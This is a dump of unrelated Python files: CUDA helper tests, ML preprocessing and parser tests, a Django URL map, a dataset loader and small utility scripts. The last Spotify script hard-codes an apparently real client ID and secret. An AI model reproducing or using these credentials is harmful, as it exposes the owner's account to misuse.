1888393 | <reponame>niklub/NeMo<filename>tests/collections/asr/numba/rnnt_loss/utils/test_rnnt_helper.py
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from numba import cuda
from nemo.collections.asr.parts.numba.rnnt_loss.utils import global_constants, rnnt_helper
class TestRNNTHelper:
    """Unit tests for the CUDA device functions in ``rnnt_helper``.

    Each test wraps the device function under test in a trivial elementwise
    kernel, launches it on device arrays, and checks the copied-back result
    against a NumPy reference.
    """

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_log_sum_exp(self):
        """log_sum_exp(0, 1) == log(1 + e) applied elementwise."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.log_sum_exp(x[x_pos], y[x_pos])

        x = np.zeros([8])  # np.random.rand(8192)
        y = np.ones([8])  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        # Bug fix: compare the *absolute* deviation. Without abs() the assert
        # also passed for sums far below the expected value.
        # Expected: 8 * log(exp(0) + exp(1)) ~= 10.50609.
        assert abs(x_new.sum() - 10.506093500145782) <= 1e-5

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_log_sum_exp_neg_inf(self):
        """log_sum_exp(-inf, 1) must collapse to 1 (the finite operand)."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.log_sum_exp(x[x_pos], y[x_pos])

        x = np.asarray([global_constants.FP32_NEG_INF] * 8)
        y = np.ones([len(x)])

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        assert np.allclose(x_new, np.ones_like(x_new), atol=1e-5)

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_div_up(self):
        """div_up(10, 2) must equal the ceiling division (10 + 2 - 1) // 2."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.div_up(x[x_pos], y[x_pos])

        x = np.full([8], fill_value=10)  # np.random.rand(8192)
        y = np.full([8], fill_value=2)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        for i in range(len(x_new)):
            assert x_new[i] == ((10 + 2 - 1) // 2)

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_add(self):
        """add(10, 2) == 12 elementwise."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.add(x[x_pos], y[x_pos])

        x = np.full([8], fill_value=10)  # np.random.rand(8192)
        y = np.full([8], fill_value=2)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        for i in range(len(x_new)):
            assert x_new[i] == 12

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_maximum(self):
        """maximum(10, 2) == 10 elementwise."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.maximum(x[x_pos], y[x_pos])

        x = np.full([8], fill_value=10)  # np.random.rand(8192)
        y = np.full([8], fill_value=2)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        for i in range(len(x_new)):
            assert x_new[i] == 10

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_identity(self):
        """identity(x) == x elementwise."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0]:
                x[x_pos] = rnnt_helper.identity(x[x_pos])

        x = np.full([8], fill_value=10)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c

        for i in range(len(x_new)):
            assert x_new[i] == x[i]

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_negate(self):
        """negate(x) == -x elementwise."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0]:
                x[x_pos] = rnnt_helper.negate(x[x_pos])

        x = np.full([8], fill_value=10)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c

        for i in range(len(x_new)):
            assert x_new[i] == -x[i]

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_exponential(self):
        """exponential(x) matches np.exp(x) within 1e-4."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0]:
                x[x_pos] = rnnt_helper.exponential(x[x_pos])

        x = np.random.rand(8)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c

        y = np.exp(x)
        for i in range(len(x_new)):
            # Bug fix: use the absolute difference; without abs() the check
            # passed whenever the device result was *smaller* than expected.
            assert abs(x_new[i] - y[i]) < 1e-4

    @pytest.mark.skipif(not cuda.is_available(), reason="CUDA Helpers can only be run when CUDA is available")
    @pytest.mark.unit
    def test_log_plus(self):
        """log_plus(x, y) matches log1p(exp(-|x-y|)) + max(x, y)."""
        # wrapper kernel for device function that is tested
        @cuda.jit
        def _kernel(x, y):
            x_pos = cuda.grid(1)
            if x_pos < x.shape[0] and x_pos < y.shape[0]:
                x[x_pos] = rnnt_helper.log_plus(x[x_pos], y[x_pos])

        x = np.full([8], fill_value=10.0)  # np.random.rand(8192)
        y = np.full([8], fill_value=2.0)  # np.random.rand(8192)

        stream = cuda.stream()
        x_c = cuda.to_device(x, stream=stream)
        y_c = cuda.to_device(y, stream=stream)

        # call kernel
        threads_per_block = global_constants.threads_per_block()
        blocks_per_grid = (x.shape[0] + threads_per_block - 1) // threads_per_block
        _kernel[blocks_per_grid, threads_per_block, stream](x_c, y_c)

        # sync kernel
        stream.synchronize()
        x_new = x_c.copy_to_host(stream=stream)
        del x_c, y_c

        # NOTE(review): exact float equality is fragile if the device computes
        # in a different precision than NumPy -- confirm, or loosen to isclose.
        z = np.log1p(np.exp(-np.fabs(x - y))) + np.maximum(x, y)
        for i in range(len(x_new)):
            assert x_new[i] == z[i]
if __name__ == '__main__':
    # Allow running this test module directly, outside the pytest CLI.
    pytest.main([__file__])
| StarcoderdataPython |
9694242 | <reponame>CybercentreCanada/assemblyline-v4-p2compat
import logging
import os
from assemblyline_v4_p2compat.common.log import init_logging
from assemblyline_v4_p2compat.common import forge
def test_logger():
    """File-based logging smoke test: bob.log and bob.err must appear in /tmp."""
    cfg = forge.get_config()
    cfg.logging.log_to_console = False
    cfg.logging.log_to_file = True
    cfg.logging.log_directory = '/tmp'
    init_logging("bob", config=cfg)
    logger = logging.getLogger("assemblyline.bob")
    logger.info("test")
    for expected_file in ('/tmp/bob.log', '/tmp/bob.err'):
        assert os.path.exists(expected_file)
| StarcoderdataPython |
6481496 | """Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.ops.sets import set_difference
from tensorflow.python.ops.sets import set_intersection
from tensorflow.python.ops.sets import set_size
from tensorflow.python.ops.sets import set_union | StarcoderdataPython |
4816641 | from django.urls import path
from core.projects.views.members import MemberApi, MembersApi
from core.projects.views.projects import ProjectsApi, ProjectApi
from core.projects.views.roles import RolesApi, RoleApi
from core.projects.views.settings import ProjectSettingsApi
from core.projects.views.tasks import ProjectTasksApi, ProjectTaskApi
# REST endpoints for projects and their nested roles, members, settings and tasks.
urlpatterns = [
    path('projects/', ProjectsApi.as_view(), name='projects'),
    path('projects/<int:project_id>/', ProjectApi.as_view(), name='project'),
    path('projects/<int:project_id>/roles/', RolesApi.as_view(), name='roles'),
    path('projects/<int:project_id>/roles/<int:role_id>/', RoleApi.as_view(), name='role'),
    path('projects/<int:project_id>/members/', MembersApi.as_view(), name='members'),
    path('projects/<int:project_id>/members/<int:member_id>/', MemberApi.as_view(), name='member'),
    path('projects/<int:project_id>/settings/', ProjectSettingsApi.as_view(), name='settings'),
    path('projects/<int:project_id>/tasks/', ProjectTasksApi.as_view(), name='tasks'),
    path('projects/<int:project_id>/tasks/<int:task_id>/', ProjectTaskApi.as_view(), name='task')
]
| StarcoderdataPython |
3246433 | <reponame>radomd92/botjagwar<filename>test/unit_tests/test_parsers/test_adjective_form_parsers.py<gh_stars>1-10
from unittest import TestCase
from api.parsers.functions import parse_el_form_of
from api.parsers.functions import parse_inflection_of
from api.parsers.functions import parse_lv_inflection_of
from api.parsers.functions import parse_one_parameter_template
from api.parsers.functions.adjective_forms import parse_adjective_form
from api.parsers.inflection_template import AdjectiveForm
class TestAdjectiveFormParsers(TestCase):
    """Parsing of wiki inflection templates into AdjectiveForm objects."""

    def test_parse_adjective_form(self):
        expression = '{{es-adj form of|minúsculo|f|sg}}'
        parsed = parse_adjective_form(expression)
        self.assertIsInstance(parsed, AdjectiveForm)
        self.assertEqual(parsed.number, 'sg')
        self.assertEqual(parsed.gender, 'f')
        self.assertEqual(parsed.lemma, 'minúsculo')

    def test_parse_lv_inflection_of(self):
        expression = '{{lv-inflection of|bagātīgs|dat|p|f||adj}}'
        parsed = parse_lv_inflection_of(AdjectiveForm)(expression)
        self.assertIsInstance(parsed, AdjectiveForm)
        self.assertEqual(parsed.number, 'p')
        self.assertEqual(parsed.case, 'dat')
        self.assertEqual(parsed.lemma, 'bagātīgs')

    def test_parse_inflection_of_adjective_form(self):
        expression = '{{inflection of|abdominālis||voc|f|p|lang=la}}'
        parser = parse_inflection_of(AdjectiveForm)
        parsed = parser(expression)
        self.assertIsInstance(parsed, AdjectiveForm)
        self.assertEqual(parsed.lemma, 'abdominālis')
        self.assertEqual(parsed.number, 'p')
        self.assertEqual(parsed.gender, 'f')
        self.assertEqual(parsed.case, 'voc')

    def test_parse_one_parameter_template(self):
        expression = '{{feminine singular of|comparatif|lang=fr}}'
        parser = parse_one_parameter_template(
            AdjectiveForm,
            'feminine singular of',
            number='s',
            definiteness='definite')
        parsed = parser(expression)
        self.assertEqual(parsed.number, 's')
        self.assertEqual(parsed.definite, 'definite')
        self.assertEqual(parsed.lemma, 'comparatif')

    def test_parse_el_form_of_adjective(self):
        expression = '{{el-form-of-nounadj|αβοκέτα|c=gen|n=s}}'
        parsed = parse_el_form_of(AdjectiveForm)(expression)
        self.assertIsInstance(parsed, AdjectiveForm)
        self.assertEqual(parsed.number, 's')
        self.assertEqual(parsed.case, 'gen')
        self.assertEqual(parsed.lemma, 'αβοκέτα')
| StarcoderdataPython |
9725968 | import numpy as np
from fedot.api.main import Fedot
from fedot.core.data.data import InputData
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.data.supplementary_data import SupplementaryData
from fedot.core.repository.dataset_types import DataTypesEnum
from fedot.core.repository.tasks import Task, TaskTypesEnum
from fedot.preprocessing.data_types import NAME_CLASS_STR
def data_with_only_categorical_features():
    """Tabular regression dataset whose three features are all categorical (binary)."""
    categorical_types = SupplementaryData(column_types={'features': [NAME_CLASS_STR] * 3})
    feature_matrix = np.array(
        [['a', '0', '1'],
         ['b', '1', '0'],
         ['c', '1', '0']],
        dtype=object,
    )
    return InputData(
        idx=[0, 1, 2],
        features=feature_matrix,
        target=np.array([0, 1, 2]),
        task=Task(TaskTypesEnum.regression),
        data_type=DataTypesEnum.table,
        supplementary_data=categorical_types,
    )
def data_with_too_much_nans():
    """Tabular data where columns 1 and 2 are missing in more than 90% of rows.

    inf values must also be treated as missing (signed as nan downstream).
    """
    feature_matrix = np.array(
        [[1, np.inf, np.nan],
         [np.nan, np.inf, np.nan],
         [3, np.inf, np.nan],
         [7, np.inf, np.nan],
         [8, np.nan, np.nan],
         [np.nan, np.nan, 23],
         [9, np.inf, np.nan],
         [9, np.inf, np.nan],
         [9, np.inf, np.nan],
         [9, '1', np.inf],
         [8, np.nan, np.inf]],
        dtype=object,
    )
    targets = np.array([[i] for i in range(11)])
    return InputData(
        idx=list(range(11)),
        features=feature_matrix,
        target=targets,
        task=Task(TaskTypesEnum.regression),
        data_type=DataTypesEnum.table,
        supplementary_data=SupplementaryData(was_preprocessed=False),
    )
def data_with_spaces_and_nans_in_features():
    """InputData whose categorical features carry leading/trailing spaces and np.nan."""
    feature_matrix = np.array(
        [['1 ', '1 '],
         [np.nan, ' 0'],
         [' 1 ', np.nan],
         ['1 ', '0 '],
         ['0 ', ' 1'],
         ['1 ', ' 0']],
        dtype=object,
    )
    return InputData(
        idx=[0, 1, 2, 3, 4, 5],
        features=feature_matrix,
        target=np.array([[i] for i in range(6)]),
        task=Task(TaskTypesEnum.regression),
        data_type=DataTypesEnum.table,
        supplementary_data=SupplementaryData(was_preprocessed=False),
    )
def data_with_nans_in_target_column():
    """Regression InputData whose target column contains np.nan values."""
    feature_matrix = np.array(
        [[1, 2],
         [2, 2],
         [0, 3],
         [2, 3],
         [3, 4],
         [1, 3]])
    targets = np.array([[0], [1], [np.nan], [np.nan], [4], [5]])
    return InputData(
        idx=[0, 1, 2, 3, 4, 5],
        features=feature_matrix,
        target=targets,
        task=Task(TaskTypesEnum.regression),
        data_type=DataTypesEnum.table,
        supplementary_data=SupplementaryData(was_preprocessed=False),
    )
def data_with_nans_in_multi_target():
    """Multi-output regression InputData with np.nan entries in the target columns."""
    feature_matrix = np.array(
        [[1, 2],
         [2, 2],
         [0, 3],
         [2, 3],
         [3, 4],
         [1, 3]])
    targets = np.array([[0, 2], [1, 3], [np.nan, np.nan], [3, np.nan], [4, 4], [5, 6]])
    return InputData(
        idx=[0, 1, 2, 3, 4, 5],
        features=feature_matrix,
        target=targets,
        task=Task(TaskTypesEnum.regression),
        data_type=DataTypesEnum.table,
        supplementary_data=SupplementaryData(was_preprocessed=False),
    )
def data_with_categorical_target(with_nan: bool = False):
    """Classification InputData with string class labels (e.g. 'blue').

    Built so that a train/test split always puts a previously unseen label
    into the test part.

    :param with_nan: when True, two of the labels are replaced by np.nan
    """
    feature_matrix = np.array(
        [[0, 0],
         [0, 1],
         [8, 8],
         [8, 9]])
    if with_nan:
        labels = np.array(['blue', np.nan, np.nan, 'di'], dtype=object)
    else:
        labels = np.array(['blue', 'da', 'ba', 'di'], dtype=str)
    return InputData(
        idx=[0, 1, 2, 3],
        features=feature_matrix,
        target=labels,
        task=Task(TaskTypesEnum.classification),
        data_type=DataTypesEnum.table,
        supplementary_data=SupplementaryData(was_preprocessed=False),
    )
def test_correct_api_dataset_preprocessing():
    """The API launch must preprocess every problematic dataset defined above."""
    generators = (data_with_only_categorical_features, data_with_too_much_nans,
                  data_with_spaces_and_nans_in_features, data_with_nans_in_target_column,
                  data_with_nans_in_multi_target)
    # Check for all datasets
    for generate in generators:
        model = Fedot(problem='regression')
        fitted_pipeline = model.fit(generate(), predefined_model='auto')
        assert fitted_pipeline is not None
def test_categorical_target_processed_correctly():
    """String class labels must round-trip through the internal integer
    encoding when using the API (encode for fit, inverse-transform on predict).
    """
    train, test = train_test_data_setup(data_with_categorical_target())
    model = Fedot(problem='classification')
    model.fit(train, predefined_model='auto')
    prediction = model.predict(test)
    # The held-out sample lies closest to the 'di' group, so the correct
    # prediction is 'ba'.
    assert prediction[0] == 'ba'
| StarcoderdataPython |
11262061 | import json
from json import JSONDecodeError
from os.path import exists
from typing import Optional, Tuple, List, Dict
import torch
from omegaconf import DictConfig
from torch.utils.data import Dataset
from utils.common import LABEL, AST, SOURCE, CHILDREN, TOKEN, PAD, NODE, SEPARATOR, UNK, SOS, EOS, SPLIT_FIELDS
from utils.vocabulary import Vocabulary
class JsonlSourceASTDataset(Dataset):
    """Dataset that reads source-code/AST samples from a JSONL file by byte offset."""
    # NOTE(review): presumably the file malformed samples are logged to; the
    # usage is not visible in this part of the class.
    _log_file = "bad_samples.log"
def __init__(self, data_file: str, vocabulary: Vocabulary, config: DictConfig):
if not exists(data_file):
raise ValueError(f"Can't find file with data: {data_file}")
self._data_file = data_file
self._vocab = vocabulary
self._config = config
self._token_unk = vocabulary.token_to_id[UNK]
self._node_unk = vocabulary.node_to_id[UNK]
self._label_unk = vocabulary.label_to_id[UNK]
self._line_offsets = []
cumulative_offset = 0
with open(self._data_file, 'r') as file:
for line in file:
self._line_offsets.append(cumulative_offset)
cumulative_offset += len(line.encode(file.encoding))
self._n_samples = len(self._line_offsets)
def __len__(self):
return self._n_samples
def _read_line(self, index: int) -> str:
with open(self._data_file, 'r') as data_file:
data_file.seek(self._line_offsets[index])
line = data_file.readline().strip()
return line
def _get_graph_features(self, ast):
max_token_parts = self._config.max_node_token_parts
max_nodes = self._config.max_ast_nodes
nodes = torch.full((max_nodes,), self._vocab.node_to_id[PAD])
node_tokens = torch.full((max_nodes, max_token_parts), self._vocab.token_to_id[PAD])
adj_matrix = torch.zeros((max_nodes, max_nodes), dtype=torch.int8)
for idx, node in enumerate(ast):
if idx == max_nodes:
break
nodes[idx] = self._vocab.node_to_id.get(node[NODE], self._node_unk)
sub_values = node[TOKEN].split(SEPARATOR)[: max_token_parts]
sub_values_ids = [self._vocab.token_to_id.get(sv, self._token_unk) for sv in sub_values]
node_tokens[idx, : len(sub_values_ids)] = torch.tensor(sub_values_ids)
for child in node[CHILDREN]:
if child < max_nodes:
adj_matrix[idx, child] = 1
adj_matrix[child, idx] = 1
return (nodes, node_tokens), adj_matrix
def _get_source_code_features(self, code):
max_tokens = self._config.max_source_parts
sc_tokens = torch.full((max_tokens,), self._vocab.token_to_id[PAD])
sub_tokens = code.split(SEPARATOR)[:max_tokens]
sc_tokens[:len(sub_tokens)] = torch.tensor(
[self._vocab.token_to_id.get(st, self._token_unk) for st in sub_tokens]
)
return sc_tokens
def _get_label(self, str_label: str) -> torch.Tensor:
label = torch.full((self._config.max_label_parts + 1, 1), self._vocab.label_to_id[PAD])
label[0, 0] = self._vocab.label_to_id[SOS]
sublabels = str_label.split(SEPARATOR)[: self._config.max_label_parts]
label[1 : len(sublabels) + 1, 0] = torch.tensor(
[self._vocab.label_to_id.get(sl, self._label_unk) for sl in sublabels]
)
if len(sublabels) < self._config.max_label_parts:
label[len(sublabels) + 1, 0] = self._vocab.label_to_id[EOS]
return label
def _read_sample(self, index: int) -> Optional[Dict]:
raw_sample = self._read_line(index)
try:
sample = json.loads(raw_sample)
except JSONDecodeError as e:
with open(self._log_file, "a") as log_file:
log_file.write(raw_sample + "\n")
return None
if sample[LABEL] == "":
with open(self._log_file, "a") as log_file:
log_file.write(raw_sample + "\n")
return None
return sample
def __getitem__(self, index: int) -> Optional[Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]]:
sample = self._read_sample(index)
if sample is None:
return None
label = self._get_label(sample[LABEL])
(nodes, node_tokens), adj_matrix = self._get_graph_features(sample[AST])
sc_tokens = self._get_source_code_features(sample[SOURCE])
return sc_tokens, nodes, node_tokens, adj_matrix, label | StarcoderdataPython |
8179149 | import click
import serial
@click.command()
@click.argument('baud_rate', type=int)
def serial_loop(baud_rate):
    """Interactive REPL that forwards each typed line to /dev/ttyACM0.

    Prompts with '> ' forever and writes the input ASCII-encoded to the
    serial port at the given baud rate; exit with Ctrl-C/Ctrl-D.
    """
    # timeout=None blocks indefinitely on serial operations.
    with serial.Serial('/dev/ttyACM0', baud_rate, timeout=None) as ser:
        while True:
            val = input("> ")
            # NOTE(review): non-ASCII input raises UnicodeEncodeError here.
            ser.write(val.encode('ascii'))
            ser.flush()
if __name__ == "__main__":
serial_loop()
| StarcoderdataPython |
375621 | <filename>tests/factory/data_factory.py
from requests import Response
from .helper import json_helper
def _build_response(status_code, content):
    """Build a mocked requests.Response with the given status and raw body.

    Shared helper: the four factory functions below only differ in status
    code and fixture file, so the Response assembly lives here once.
    """
    response = Response()
    response.status_code = status_code
    response._content = content
    return response


def mock_success_spotify_token_response():
    """Mocked 200 response for the Spotify token endpoint."""
    return _build_response(
        200, json_helper.get_json_mock('spotify_token_response_success.json'))


def mock_failure_spotify_token_response():
    """Mocked 500 response (empty body) for the Spotify token endpoint."""
    return _build_response(500, None)


def mock_success_spotify_search_music_response():
    """Mocked 200 response for the Spotify track-search endpoint."""
    return _build_response(
        200, json_helper.get_json_mock('spotify_search_response_success.json'))


def mock_success_spotify_track_detail_response():
    """Mocked 200 response for the Spotify track-detail endpoint."""
    return _build_response(
        200, json_helper.get_json_mock('spotify_track_detail_response_success.json'))
| StarcoderdataPython |
9748077 | <gh_stars>1-10
import sys
import os
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from net.dstg import *
if __name__ == '__main__':
    # Graph configuration: skeleton layout and edge-partition strategy
    # passed through to the DSTG graph constructor.
    graph_args = {
        'layout':'openpose',
        'strategy':'spatial'
    }
    model = DSTG(graph_args,depth=16)
    # Smoke test: print every trainable parameter name of the model.
    for name,para in model.named_parameters():
        print(name)
    # print(model)
8128613 | #!/usr/bin/env python
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
# Absolute site URL used in the generated (published) output.
SITEURL = "https://musard.com"
# Emit absolute URLs -- required for correct links in production/feeds.
RELATIVE_URLS = False
# Serve feeds from the same domain as the site.
FEED_DOMAIN = SITEURL
# Publish a single Atom feed containing all articles.
FEED_ALL_ATOM = "feeds/all.atom.xml"
# Wipe the output directory before each publish build.
DELETE_OUTPUT_DIRECTORY = True
| StarcoderdataPython |
12827658 | <filename>src/siamese_network_bw/graph.py
import re
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from matplotlib.font_manager import FontProperties
import constants
def plot_results(training_details, validation_details, note=None):
    """
    Generates a combined training/validation graph and saves it to
    constants.OUTPUT_GRAPH_PATH.

    training_details / validation_details: dicts with "iters" and "loss"
    lists of equal length. note: optional extra text for the subtitle.
    (Python 2 module -- note the statement-form print below.)
    """
    print "\tPlotting results..."
    # Left axis (blue): training loss over iterations.
    fig, ax1 = plt.subplots()
    ax1.plot(training_details["iters"], training_details["loss"], "b-")
    ax1.set_xlabel("Iterations")
    ax1.set_ylabel("Training Loss", color="b")
    for tl in ax1.get_yticklabels():
        tl.set_color("b")
    # Right axis (red): validation loss, sharing the same x axis.
    ax2 = ax1.twinx()
    ax2.plot(validation_details["iters"], validation_details["loss"], "r-")
    ax2.set_ylabel("Validation Loss", color="r")
    for tl in ax2.get_yticklabels():
        tl.set_color("r")
    legend_font = FontProperties()
    legend_font.set_size("small")
    blue_line = mpatches.Patch(color="blue", label="Training Loss")
    red_line = mpatches.Patch(color="red", label="Validation Loss")
    plt.legend(handles=[blue_line, red_line], prop=legend_font, loc="lower right")
    plt.suptitle("Iterations vs. Training/Validation Loss", fontsize=14)
    # Subtitle shows the solver hyperparameters parsed from the prototxt.
    plt.title(get_hyperparameter_details(note), style="italic", fontsize=12)
    plt.savefig(constants.OUTPUT_GRAPH_PATH)
    print("\t\tGraph saved to %s" % constants.OUTPUT_GRAPH_PATH)
def get_hyperparameter_details(note=None):
    """
    Parse the values we need from the Caffe solver prototxt file and format
    them as a parenthesized summary string for the graph subtitle.

    note: optional extra text appended inside the parentheses.
    Raises AttributeError if base_lr or max_iter is missing from the file.
    """
    # Use a context manager so the solver file handle is always closed
    # (the original opened the file and never closed it).
    with open(constants.SOLVER_FILE, "r") as solver:
        details = solver.read()
    # Raw strings for the regexes; MULTILINE so ^/$ match per prototxt line.
    lr = re.search(r"^base_lr:\s*([0-9.]+)$", details, re.MULTILINE).group(1)
    max_iter = re.search(r"^max_iter:\s*([0-9.]+)$", details, re.MULTILINE).group(1)
    results = "(lr: %s; max_iter: %s; %s" % (lr, max_iter, constants.ARCHITECTURE)
    # Add any extra details into the graph if someone specified that on the command line.
    if note:
        results += "; %s" % note
    results += ")"
    return results
| StarcoderdataPython |
9666962 | #!/usr/bin/env python
"""
@package ion.agents.platform.rsn.simulator.logger
@file ion/agents/platform/rsn/simulator/logger.py
@author <NAME>
@brief Logger configuration for the OMS simulator.
"""
__author__ = '<NAME>'
class Logger(object):
    """Holds the single logger instance used by the OMS simulator.

    The logger is either injected from outside via set_logger() or lazily
    created on first get_logger() call, with its level taken from the
    oms_simulator_loglevel environment variable (default WARN).
    """

    # Shared logger instance; None until injected or lazily created.
    log = None

    @classmethod
    def set_logger(cls, log):
        """
        Allows to specify the logger from outside (in particular to allow the
        use of pyon.public.log).
        """
        cls.log = log

    @classmethod
    def get_logger(cls):
        """
        Gets the logger for the simulator. This is configured here unless a
        logger has been specified via set_logger.
        """
        if not cls.log:
            import logging
            import os
            log = logging.getLogger('oms_simulator')
            level_name = os.getenv("oms_simulator_loglevel", "WARN")
            # Look the level up as an attribute of the logging module instead
            # of eval()'ing arbitrary text taken from the environment.
            level = getattr(logging, level_name, None)
            if isinstance(level, int):
                print("oms_simulator: setting log level to: logging.%s" % level_name)
            else:
                print("oms_simulator: unknown log level logging.%s" % level_name)
                print("oms_simulator: setting log level to: logging.DEBUG")
                level = logging.DEBUG
            log.setLevel(level)
            handler = logging.StreamHandler()
            handler.setLevel(level)
            log_format = '%(asctime)s %(levelname)-8s %(threadName)s %(name) -15s:%(lineno)d %(funcName)s %(message)s'
            formatter = logging.Formatter(log_format)
            handler.setFormatter(formatter)
            log.addHandler(handler)
            cls.log = log
        return cls.log
| StarcoderdataPython |
1740116 | <gh_stars>0
from guet.git.hook_present import hook_present
def any_hooks_present(git_path: str):
    """Report whether any of the three guet git hooks exists in *git_path*."""
    # Check all three hooks (no short-circuit, matching the original calls).
    checks = [
        hook_present(git_path, hook_name)
        for hook_name in ('pre-commit', 'post-commit', 'commit-msg')
    ]
    return checks[0] or checks[1] or checks[2]
| StarcoderdataPython |
6638282 | <reponame>shaswat01/MoodZen<filename>src/search_song.py
from spotify_api import *
# NOTE(review): Spotify API credentials are hard-coded in source; they should
# be revoked and moved to environment variables / a config file.
client_id = "718bb5e6caca403c942c2a292492ae64"
client_secret = "4980e48cec984e9aad21b60205c3f01b"
# Module-level client instance shared by search_new_song().
spotify = SpotifyAPI(client_id, client_secret)
